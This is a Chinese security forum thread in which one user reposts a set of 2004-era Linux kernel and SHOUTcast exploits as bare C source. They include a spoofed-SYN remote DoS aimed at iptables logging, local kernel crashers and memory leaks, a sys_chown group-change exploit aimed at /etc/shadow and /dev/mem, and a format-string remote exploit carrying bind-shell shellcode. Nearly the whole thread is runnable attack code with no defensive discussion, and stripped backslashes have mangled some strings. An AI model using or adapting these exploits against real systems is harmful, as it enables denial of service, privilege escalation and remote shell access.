20CN网络安全小组论坛 - UNIX系统 - LinuxKernel<=2.6.7FirewallLoggingRulesRemoteDoSExploit

论坛: UNIX系统标题: LinuxKernel<=2.6.7FirewallLoggingRulesRemoteDoSExploit

作者: vy07 [vy07]

论坛用户

/*
*
* iptables.log.integer.underflow.POC.c
*
* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
*
* felix__zhou _at_ hotmail _dot_ com
*
* */

#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>

#pragma comment(lib,"ws2_32")

static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];

static unsigned char sip[4];
static unsigned int sa;
static unsigned short sp;
static unsigned char sport[2];

/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = ip;

while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}

if (size)
csum += *p;

csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);

sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/

static void tcp_csum(unsigned char *tcp, unsigned char *ip,
unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = tcp;

while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}

csum += (ip[12] << 8) + ip[13];
csum += (ip[14] << 8) + ip[15];

csum += (ip[16] << 8) + ip[17];
csum += (ip[18] << 8) + ip[19];

csum += 0x06;
csum += 0x14;

if (size)
csum += *p;

csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);

sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}

static int work(SOCKET s)
{
DWORD ret = 1;
unsigned char buf[1500];
unsigned char *ip;
unsigned char *tcp;
unsigned int seq = 0x01;
struct sockaddr_in host;

ZeroMemory(buf, 1500);

ip = buf;
tcp = buf + 20;

ip[0] = 0x45; /* ver & hlen */
ip[3] = 0x28; /* tlen */
ip[8] = 0x80; /* ttl */
ip[9] = 0x06; /* protocol */
ip[10] = ip[11] = 0;
ip[12] = sip[0]; /* saddr */
ip[13] = sip[1];
ip[14] = sip[2];
ip[15] = sip[3];
ip[16] = dip[0]; /* daddr */
ip[17] = dip[1];
ip[18] = dip[2];
ip[19] = dip[3];

tcp[0] = sport[0];
tcp[1] = sport[1];
tcp[2] = dport[0]; /* dport */
tcp[3] = dport[1];
tcp[12] = 0x40; /* hlen */ /* HERE */
tcp[13] = 0x02; /* flags */

ZeroMemory(&host, sizeof(struct sockaddr_in));
host.sin_family = AF_INET;
host.sin_port = dp;
host.sin_addr.s_addr = da;

for (;; ) {
tcp[4] = (seq >> 24); /* seq number */
tcp[5] = ((seq << 8) >> 24);
tcp[6] = ((seq << 16) >> 24);
tcp[7] = ((seq << 24) >> 24);
tcp[16] = tcp[17] = 0;
seq ++;

tcp_csum(tcp, ip, 0x14, tcp + 16);

if (SOCKET_ERROR == sendto(s, buf, 0x28, 0,
(SOCKADDR *)&(host), sizeof host)) {
if (WSAEACCES != WSAGetLastError()) {
printf("sendto() failed: %dn",
WSAGetLastError());

ret = 1;
} else {
printf("You must be Administrator!n");
}

break;
}
}

return ret;
}

static char usage[] = "Usage: %s dip dport sip sportn";

int main(int argc, char **argv)
{
WORD ver = MAKEWORD(2, 2);
WSADATA data;
unsigned char *p;
SOCKET s;
int ret = 1;
BOOL eopt = TRUE;

if (5 != argc) {
printf(usage, argv[0]);
goto out;
}

if (INADDR_NONE == (da = inet_addr(argv[1]))) {
printf("dest ip address is NOT valid!n");
printf(usage, argv[0]);
goto out;
}

p = (unsigned char *)&da;
dip[0] = p[0];
dip[1] = p[1];
dip[2] = p[2];
dip[3] = p[3];

dp = atoi(argv[2]);
dport[0] = ((dp << 16) >> 24);
dport[1] = ((dp << 24) >> 24);

if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
printf("source ip address is NOT valid!n");
printf(usage, argv[3]);
goto out;
}

p = (unsigned char *)&sa;
sip[0] = p[0];
sip[1] = p[1];
sip[2] = p[2];
sip[3] = p[3];

sp = atoi(argv[4]);
sport[0] = ((sp << 16) >> 24);
sport[1] = ((sp << 24) >> 24);

srand((unsigned int)time(0));

if (WSAStartup(ver, &data)) {
printf("WSAStartup() failedn");
goto out;
}

if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0)))
goto err;

if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL,
(char *)&eopt, sizeof(eopt)))
goto err1;

work(s);

err1:
closesocket(s);
err:
WSACleanup();

out:
return ret;
}

地主发表时间: 06-01-22 13:55

回复: vy07 [vy07]

论坛用户

/*
*
*binfmt_elf executable file read vulnerability
*
*gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
*
*Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
*THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
*AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
*WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* http://isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>

#include <linux/elf.h>

#define BADNAME "/tmp/_elf_dump"

void usage(char *s)
{
printf("nUsage: %s executablenn", s);
exit(0);
}

//ugly mem scan code :-)
static volatile void bad_code(void)
{
__asm__(
//"1:jmp 1b n"
"xorl%edi, %edin"
"movl%esp, %esin"
"xorl%edx, %edxn"
"xorl%ebp, %ebpn"
"callget_addrn"

"movl%esi, %espn"
"movl%edi, %ebpn"
"jmpinst_sign"

"get_addr:popl%ecxn"

//sighand
"inst_sig:xorl%eax, %eaxn"
"movl$11, %ebxn"
"movb$48, %aln"
"int$0x80n"

"ld_page:movl%ebp, %eaxn"
"subl%edx, %eaxn"
"cmpl$0x1000, %eaxn"
"jleld_page2n"

//mprotect
"pushan"
"movl%edx, %ebxn"
"addl $0x1000, %ebxn"
"movl%eax, %ecxn"
"xorl%eax, %eaxn"
"movb$125, %aln"
"movl$7, %edxn"
"int$0x80n"
"popan"

"ld_page2:addl$0x1000, %edin"
"cmpl$0xc0000000, %edin"
"jedumpn"
"movl%ebp, %edxn"
"movl(%edi), %eaxn"
"jmpld_pagen"

"dump:xorl%eax, %eaxn"
"xorl%ecx, %ecxn"
"movl$11, %ebxn"
"movb$48, %aln"
"int$0x80n"
"movl$0xdeadbeef, %eaxn"
"jmp*(%eax)n"

);
}

static volatile void bad_code_end(void)
{
}

int main(int ac, char **av)
{
struct elfhdr eh;
struct elf_phdr eph;
struct rlimit rl;
int fd, nl, pid;

if(ac<2)
usage(av[0]);

//make bad a.out
fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);
nl = strlen(av[1])+1;
memset(&eh, 0, sizeof(eh) );

//elf exec header
memcpy(eh.e_ident, ELFMAG, SELFMAG);
eh.e_type = ET_EXEC;
eh.e_machine = EM_386;
eh.e_phentsize = sizeof(struct elf_phdr);
eh.e_phnum = 2;
eh.e_phoff = sizeof(eh);
write(fd, &eh, sizeof(eh) );

//section header(s)
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_INTERP;
eph.p_offset = sizeof(eh) + 2*sizeof(eph);
eph.p_filesz = nl;
write(fd, &eph, sizeof(eph) );

memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = 0x0000;
eph.p_flags = PF_R|PF_X;
write(fd, &eph, sizeof(eph) );

//.interp
write(fd, av[1], nl );

//execable code
nl = &bad_code_end - &bad_code;
lseek(fd, 4096, SEEK_SET);
write(fd, &bad_code, 4096);
close(fd);

//dump the shit
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
if( setrlimit(RLIMIT_CORE, &rl) )
perror("nsetrlimit failed");
fflush(stdout);
pid = fork();
if(pid)
wait(NULL);
else
execl(BADNAME, BADNAME, NULL);

printf("ncore dumped!nn");
unlink(BADNAME);

return 0;
}

B1层发表时间: 06-01-22 13:57

回复: vy07 [vy07]

论坛用户

/* int overflow in ip_options_get
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[12];

s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);

connect(s,(struct sockaddr *) &sockad, sizeof(sockad));

memset(msg,'v',sizeof(msg));
memset(opts,0,sizeof(opts));
#define VV 1024*1024
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = -1;

msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);

msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + 420;
msghdr.msg_iov = iovector;

msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
system("sync");
if ((i = sendmsg(s, &msghdr, 0)) < 0)
perror("sendmsg");
return 42;
}

B2层发表时间: 06-01-22 13:57

回复: vy07 [vy07]

论坛用户

/* memory leak
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s,j,ma;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[24];

ma=250;
printf("just wait and watch memory usage\n");

memset(opts,0,sizeof(opts));

while(42)
{
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);

connect(s,(struct sockaddr *) &sockad, sizeof(sockad));

memset(msg,'v',sizeof(msg));
#define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024)
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));

cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
for(j=0;j<ma;j++)
{
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts));
}

cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + 8;

msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);

msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len;
msghdr.msg_iov = iovector;

msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);

if ((i = sendmsg(s, &msghdr, 0)) < 0)
{perror("sendmsg");return -42;}

close(s);
free(cmsg);
}
return 42;
}

B3层发表时间: 06-01-22 13:58

回复: vy07 [vy07]

论坛用户

/* vc_resize int overflow
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases
* */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;

fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;

/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;

system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}

B4层发表时间: 06-01-22 13:58

回复: vy07 [vy07]

论坛用户

/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
* 3.0, probably others) the shadow group has read access to it.
* 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/

#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

int main(int argc, char **argv)
{
char cmd[256];

/* print exploit information */
fprintf(stderr, "%sn%snn", INFO1, INFO2);

/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s file_namenn", argv[0]);
exit(1);
}

/* ninpou: sys_chown no jutsu! */
if (chown(argv[1], -1, getgid()) < 0) {
switch(errno) {
case EPERM:
fprintf(stderr, "Error: Not vulnerable!n");
break;
default:
perror("Error");
}
exit(1);
}
fprintf(stderr, "Ninpou: sys_chown no jutsu!n");

/* print some output */
sprintf(cmd, "/bin/ls -l %s", argv[1]);
system(cmd);

exit(0);
}

B5层发表时间: 06-01-22 13:59

回复: vy07 [vy07]

论坛用户

/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit */
/* Damian Put <pucik cc-team org> Cyber-Crime Team (www.CC-Team.org) */
/* Tested on slackware 9.1 and 10.0 (0xbf3feee0) */
/* When exploit only crash SHOUTcast we should calculate new address: */
/* */
/* bash-2.05b$ gdb sc_serv core */
/* ... */
/* (gdb) x/x $edi */
/* 0xbe462270: 0x78257825 */
/* (gdb) x/x 0xbe462270-996 */
/* 0xbe461e8c: 0x5050c031 */
/* */
/* 0xbe461e8c - This is our shellcode addr */
/* */
/* Now we "only" must change format string code in req2 :-) */

#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* Default SHOUTcast port */
#define PORT 8000

char shellcode[] = //bindshellcode (port 7000)
"x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6"
"xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50"
"x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a"
"x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31"
"xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0"
"x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80"
"x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";

int main(int argc, char *argv[])
{
int sock;
char *host;
struct hostent *h;
struct sockaddr_in dest;

char req1[1024] = "GET /content/AA"
/* sprintf GOT addr */
"x3cx49x06x08x3dx49x06x08x3ex49x06x08x3fx49x06x08";

strcat(req1, shellcode);
strcat(req1, ".mp3 HTTP/1.0rnrn");

/* We cannot use %numberx and %number$n (filtered) */
/* 0xbf3feee0 - shellcode addr on slackware 9.1 */
char *req2 = "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAA-
%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA-
%n.mp3"
" HTTP/1.0rnrn";

printf("SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by pucik www.CC-Team.orgn");
if(argc < 2)
{
printf("Usage: %s <host>n", argv[0]);
exit(0);
}

host = argv[1];

if(!(h = gethostbyname(host)))
{
fprintf(stderr, "Cannot get IP of %s, %s!n", host, strerror(errno));
exit(-1);
}

sock = socket(PF_INET, SOCK_STREAM, 0);

dest.sin_addr=*((struct in_addr*)h->h_addr);
dest.sin_family = PF_INET;
dest.sin_port = htons(PORT);

if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) == -1)
{
fprintf(stderr, "Cannot connect to %s, %s!n", host, strerror(errno));
exit(-1);
}

printf("
Sending first request ...n");
write(sock, req1, strlen(req1));

close(sock);

sock = socket(PF_INET, SOCK_STREAM, 0);

if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) == -1)
{
fprintf(stderr, "Cannot connect to %s, %s!n", host, strerror(errno));
exit(-1);
}

printf("
Sending second request ...n");
write(sock, req2, strlen(req2));

close(sock);

printf("
Try telnet %s 7000 :)n", host);

return 0;
}

B6层发表时间: 06-01-22 14:00

论坛: UNIX系统